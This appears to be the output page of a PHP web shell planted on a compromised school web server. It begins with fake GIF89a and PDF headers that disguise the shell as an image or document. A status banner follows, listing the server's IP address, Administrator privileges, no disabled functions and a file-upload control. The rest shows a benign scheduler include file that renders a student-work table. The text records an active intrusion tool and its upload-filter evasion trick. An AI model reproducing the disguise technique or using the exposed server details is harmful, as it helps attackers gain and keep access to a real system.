GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Scheduler/ |
Upload File : |
<? // StudentWork.phpinc // Display site needs on the main page. t_Begin(); // Begin TRACKing StudentWork.phpinc. ?> <style> div.mainnotes { height:18em; margin: 0 1em 1em 0; overflow-y:auto; } table.mainnotes tr { vertical-align:top; } table.mainnotes tr td { background-color: transparent; padding:2px 4px; } table.mainnotes tr td:first-child, table.mainnotes tr th:first-child { text-align:right; white-space:nowrap; } table.mainnotes tr td:nth-child(2) { white-space:nowrap; } table.mainnotes tr th:nth-child(2) { text-align:center; } table.mainnotesDone tr td { color: #666; } </style> <h2 class="center nobm">Student work</h2> <div class="mainnotes"> <table class="mainnotes" class="notm"> <tr> <th class="left">Student name</th> <th class="left">Work name</th> <th class="left">Deliverables</th> <th class="left">Due date</th> <th class="left">Points</th> <th class="left">Status</th> </tr> <tr> <td>Nicholas Huseby</td> <td>Remove font-awsome</td> <td>Replace font-awsome icons and remove references to font-awsome use.</td> <td>n/a</td> <td>10</td> <td>Done</td> </tr> <? /** / ?> <tr> <td>student_name</td> <td>work_name</td> <td>deliverables</td> <td>due_date</td> <td>points</td> <td>working</td> </tr> <? /**/ ?> </table> </div> <? t_End(); // End TRACKing StudentWork.phpinc. ?>